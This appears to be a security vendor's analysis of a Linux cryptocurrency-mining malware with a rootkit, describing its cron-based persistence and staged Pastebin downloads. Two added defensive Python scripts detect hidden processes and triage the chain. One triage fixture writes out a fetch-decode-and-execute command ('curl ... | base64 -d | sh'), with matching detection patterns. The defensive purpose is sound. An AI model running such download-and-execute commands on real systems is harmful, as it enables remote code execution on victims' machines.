


By Augusto II Remillano, Kiyoshi Obuchi, and Arvin Roi Macaraeg

With the popularity of cryptocurrencies, it is no surprise that cybercriminals continue to develop and fine-tune various cryptocurrency-mining malware. Indeed, this kind of threat is one of the malware families Trend Micro most consistently detects, affecting a wide range of platforms and devices.

We recently encountered a cryptocurrency-mining malware (detected by Trend Micro as ) affecting Linux systems. It is notable for being bundled with a rootkit component ( ) that hides the malicious process's presence from monitoring tools. This makes it difficult to detect: an infected system shows nothing beyond degraded performance, because the tools an administrator would normally use to find the culprit do not list the miner. The malware is also capable of updating and upgrading itself and its configuration file.

Interestingly, the permission model in Unix and Unix-like operating systems like Linux makes it tricky to run executables with elevated privileges. We infer that this cryptocurrency-mining malware's infection vector is a malicious, third-party/unofficial or compromised plugin (e.g., for media-streaming software). Installing one entails granting it admin rights, and in the case of a compromised application, the malware runs with whatever privileges were granted to that application. It's not an uncommon vector, as other Linux cryptocurrency-mining malware tools have also used this as an entry point.

Figure 1: The cryptocurrency-mining malware's infection chain

The initial file ( ) connects to Pastebin and downloads a file from it. The downloaded file, which is a shell script, is saved as /bin/httpdns. A scheduled task (cron job) is created to run /bin/httpdns every hour. Lastly, the downloaded shell script is executed.

Figure 2: How the shell script is downloaded and saved

/bin/httpdns contains a shell script that connects out and downloads another base64-encoded text file. After decoding, the resulting file is also a shell script, which /bin/httpdns then executes. Once executed, this shell script first checks whether there is an update available for the malware.
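The write-up says the rootkit component hides the miner from monitoring tools but does not say how. The following sweep is an added example (not the authors' code) of the check a responder would run on a suspect host. It assumes the rootkit filters directory listings, which is the common userland hook, so that anything enumerating /proc misses the process, while an existence probe that never goes through a listing (kill(pid, 0), or opening /proc/<pid>/status by name) still answers. A rootkit that also hooks those calls defeats the sweep, so a clean result means "nothing found", not "clean". The function and file names are the example's own.

```python
"""Unhide-style sweep for processes missing from the /proc listing.

Added example for the rootkit behaviour described in the write-up; not the
authors' code. Assumption: the rootkit hides /proc entries from directory
listings but does not block kill(pid, 0) or opening /proc/<pid>/status by
name. Non-leader threads are filtered out so they are not reported as hidden.
"""
import os
from typing import Callable, Optional, Set

ProbeFn = Callable[[int], bool]
TgidFn = Callable[[int], Optional[int]]


def listed_pids(proc_dir: str = "/proc") -> Set[int]:
    """PIDs the way ps/top obtain them: numeric directory entries under /proc."""
    return {int(name) for name in os.listdir(proc_dir) if name.isdigit()}


def pid_exists(pid: int) -> bool:
    """Existence probe that does not rely on a directory listing."""
    try:
        os.kill(pid, 0)
    except ProcessLookupError:
        return False
    except PermissionError:
        return True  # exists but belongs to another user
    return True


def proc_tgid(pid: int, proc_dir: str = "/proc") -> Optional[int]:
    """Thread-group id from /proc/<pid>/status, or None if it cannot be read."""
    try:
        with open(f"{proc_dir}/{pid}/status") as fh:
            for line in fh:
                if line.startswith("Tgid:"):
                    return int(line.split()[1])
    except OSError:
        return None
    return None


def hidden_pids(listed: Set[int], pid_max: int,
                probe: ProbeFn = pid_exists,
                tgid_of: TgidFn = proc_tgid) -> Set[int]:
    """PIDs that answer the probe but are absent from the listing.

    Non-leader threads also answer kill(pid, 0) and are never listed in /proc,
    so a PID whose Tgid differs from itself is a thread, not a hit. A PID that
    exists but whose status file cannot be opened is reported, since that is
    exactly what a hook on open() would look like.
    """
    hidden = set()
    for pid in range(1, pid_max + 1):
        if pid in listed or not probe(pid):
            continue
        tgid = tgid_of(pid)
        if tgid is not None and tgid != pid:
            continue  # an ordinary thread of some process
        hidden.add(pid)
    return hidden


def read_pid_max(path: str = "/proc/sys/kernel/pid_max") -> int:
    """Upper bound for the sweep; Linux defaults to 32768 or 4194304."""
    with open(path) as fh:
        return int(fh.read())


if __name__ == "__main__":
    found = hidden_pids(listed_pids(), read_pid_max())
    print("hidden pids:", sorted(found) or "none")
```

Run it as root so that kill(pid, 0) never returns EPERM ambiguously, and compare any hit against the CPU usage the write-up mentions: a hidden PID with high CPU time in /proc/<pid>/stat is the miner.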
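The staged chain described above (hourly cron job running /bin/httpdns, a fetch from Pastebin, a base64-encoded text file that is decoded and handed to a shell) can be turned into a small static triage. The script below is an added example, not code from the authors or from the malware. The crontab lines, the stage-2 script, its placeholder URL and the base64 blob are all constructed samples, and the helper names are the example's own. The one design point worth noting is decode_stage: it decodes the downloaded text for inspection and never executes it, which is the opposite of what /bin/httpdns does.

```python
"""Triage helpers for the staged shell-script infection chain described above.

Added example, not code from the authors or from the malware. Indicators come
straight from the description: an hourly cron entry running /bin/httpdns, a
stage that fetches from Pastebin, and a stage that base64-decodes downloaded
text and pipes it into a shell. All inputs below are constructed samples.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Constructed crontab: the first entry mirrors the hourly job; the rest are noise.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 * * * * /bin/httpdns
*/10 * * * * root /usr/lib/sysstat/sa1 1 1
30 2 * * * /usr/local/bin/backup.sh
"""

# Constructed stage-2 script (fetch, decode, execute). The URL is a placeholder.
SAMPLE_STAGE2 = """\
#!/bin/sh
curl -fsSL https://pastebin.com/raw/EXAMPLE | base64 -d | sh
"""

# Constructed stand-in for the base64-encoded text file that stage 2 pulls down.
SAMPLE_STAGE3_B64 = base64.b64encode(
    b"#!/bin/sh\n# constructed stage-3 stub\ntest -f /tmp/update && echo update\n"
).decode()

# Commands named in the write-up; extend as new samples appear.
WATCHLIST = ("/bin/httpdns",)

HOURLY = re.compile(r"^0\s+\*\s+\*\s+\*\s+\*\s+")  # minute 0 of every hour
FETCH_PASTEBIN = re.compile(r"\b(curl|wget)\b[^\n|]*pastebin\.com")
DECODE_EXEC = re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(/bin/)?(sh|bash)\b")


def hourly_cron_jobs(crontab: str) -> List[str]:
    """Commands of entries that fire once per hour ("0 * * * *" or @hourly)."""
    jobs = []
    for line in crontab.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@hourly"):
            jobs.append(line[len("@hourly"):].strip())
            continue
        m = HOURLY.match(line)
        if m:
            jobs.append(line[m.end():].strip())
    return jobs


def script_indicators(script: str) -> Dict[str, bool]:
    """Static indicators of a downloader stage: Pastebin fetch, decode-and-run."""
    return {
        "fetches_pastebin": bool(FETCH_PASTEBIN.search(script)),
        "decodes_and_executes": bool(DECODE_EXEC.search(script)),
    }


def decode_stage(blob: str) -> Optional[str]:
    """Decode a base64 stage for inspection instead of piping it into sh.

    Returns None when the text is not valid base64, so a caller never treats
    an arbitrary download as a decoded script.
    """
    compact = "".join(blob.split())
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None
    return raw.decode("utf-8", errors="replace")


def triage(crontab: str, stage2: str, stage3_blob: str) -> Dict[str, object]:
    """Combine the checks into one report; 'verdict' is True on any hit."""
    hourly = hourly_cron_jobs(crontab)
    hits = [cmd for cmd in hourly if any(w in cmd for w in WATCHLIST)]
    indicators = script_indicators(stage2)
    decoded = decode_stage(stage3_blob)
    nested = script_indicators(decoded) if decoded else {}
    return {
        "hourly_jobs": hourly,
        "watchlist_hits": hits,
        "stage2": indicators,
        "stage3_decoded": decoded,
        "stage3_indicators": nested,
        "verdict": bool(hits) or all(indicators.values()),
    }


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_CRONTAB, SAMPLE_STAGE2, SAMPLE_STAGE3_B64), indent=2))
```

On a live host, feed hourly_cron_jobs the contents of /etc/crontab, /etc/cron.d/* and each user's crontab -l output, and review every hourly job rather than only the watchlist hit, since the file name is the easiest thing for the operators to change.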
